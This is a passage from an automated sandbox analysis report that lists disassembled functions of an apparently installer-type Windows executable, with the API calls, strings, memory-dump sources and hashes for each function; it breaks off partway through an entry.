                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: DrawText$ByteCharMultiWide
                                                              • String ID: %H
                                                              • API String ID: 65125430-1959103961
                                                              • Opcode ID: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                              • Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
                                                              • Opcode Fuzzy Hash: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                              • Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
                                                              Function 0042ED38 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                              • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                              • API String ID: 395431579-1506664499
                                                              • Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                              • Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
                                                              • Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                              • Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
                                                              Function 00455A10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
                                                              Strings
                                                              • PendingFileRenameOperations, xrefs: 00455A40
                                                              • PendingFileRenameOperations2, xrefs: 00455A4F
                                                              • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                              • API String ID: 47109696-2115312317
                                                              • Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                              • Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
                                                              • Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                              • Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
                                                              Function 00472154 Relevance: 6.3, APIs: 4, Instructions: 272fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
                                                              • FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
                                                              • FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileNext
                                                              • String ID:
                                                              • API String ID: 2066263336-0
                                                              • Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                              • Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
                                                              • Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                              • Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
                                                              Function 0047FCF8 Relevance: 6.1, APIs: 4, Instructions: 147fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
                                                              • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
                                                              • FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileNext
                                                              • String ID:
                                                              • API String ID: 2066263336-0
                                                              • Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                              • Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
                                                              • Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                              • Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
                                                              Function 00421274 Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetMenu.USER32(00000000), ref: 00421361
                                                              • SetMenu.USER32(00000000,00000000), ref: 0042137E
                                                              • SetMenu.USER32(00000000,00000000), ref: 004213B3
                                                              • SetMenu.USER32(00000000,00000000), ref: 004213CF
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Menu
                                                              • String ID:
                                                              • API String ID: 3711407533-0
                                                              • Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                              • Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
                                                              • Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                              • Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
                                                              Function 00416B42 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageA.USER32(?,?,?,?), ref: 00416B84
                                                              • SetTextColor.GDI32(?,00000000), ref: 00416B9E
                                                              • SetBkColor.GDI32(?,00000000), ref: 00416BB8
                                                              • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Color$CallMessageProcSendTextWindow
                                                              • String ID:
                                                              • API String ID: 601730667-0
                                                              • Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                              • Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
                                                              • Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                              • Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
                                                              Function 004230C8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0042311E
                                                              • EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CapsDeviceEnumFontsRelease
                                                              • String ID:
                                                              • API String ID: 2698912916-0
                                                              • Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                              • Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
                                                              • Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                              • Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                              Function 0045C264 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                              • FlushFileBuffers.KERNEL32(?), ref: 0045C499
                                                              Strings
                                                              • EndOffset range exceeded, xrefs: 0045C3CD
                                                              • NumRecs range exceeded, xrefs: 0045C396
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: File$BuffersFlush
                                                              • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                              • API String ID: 3593489403-659731555
                                                              • Opcode ID: a46ebc0c75e38cfc1d47e83880391ac29e35d2e9842f1f48ebdcfee3728b7fb6
                                                              • Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
                                                              • Opcode Fuzzy Hash: a46ebc0c75e38cfc1d47e83880391ac29e35d2e9842f1f48ebdcfee3728b7fb6
                                                              • Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
                                                              Function 00498BA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                • Part of subcall function 004063C4: 6F561CD0.COMCTL32(00498BC5), ref: 004063C4
                                                                • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
                                                                • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
                                                                • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
                                                              • SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
                                                                • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                              • ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
                                                                • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF561FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                              • String ID: Setup
                                                              • API String ID: 629812316-3839654196
                                                              • Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                              • Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                              • Opcode Fuzzy Hash: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                              • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
                                                              Function 0042DC00 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: QueryValue
                                                              • String ID: $=H
                                                              • API String ID: 3660427363-3538597426
                                                              • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                              • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                              • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                              • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                              Function 00453A24 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                              • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID: .tmp
                                                              • API String ID: 1375471231-2986845003
                                                              • Opcode ID: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                              • Instruction ID: 2c169793aa1d4e8b0ae54453200dd0eeecd34c8d921a2c5b894f13e1de3ec917
                                                              • Opcode Fuzzy Hash: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                              • Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                              Function 00483F88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                              • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                              • String ID: SHGetKnownFolderPath$shell32.dll
                                                              • API String ID: 3869789854-2936008475
                                                              • Opcode ID: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                              • Instruction ID: 8066e8dcbdf9c94243579ba2519058cd674f052446347c20ec70bbddfecd8a90
                                                              • Opcode Fuzzy Hash: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                              • Instruction Fuzzy Hash: 1021F1B06103116AC700BFBE599611B3BA5EB9570C380893FF904DB391D77E68149B6E
                                                              Function 0047C5D8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36registryCOMMON
                                                              Download Yara Rule
                                                              APIs
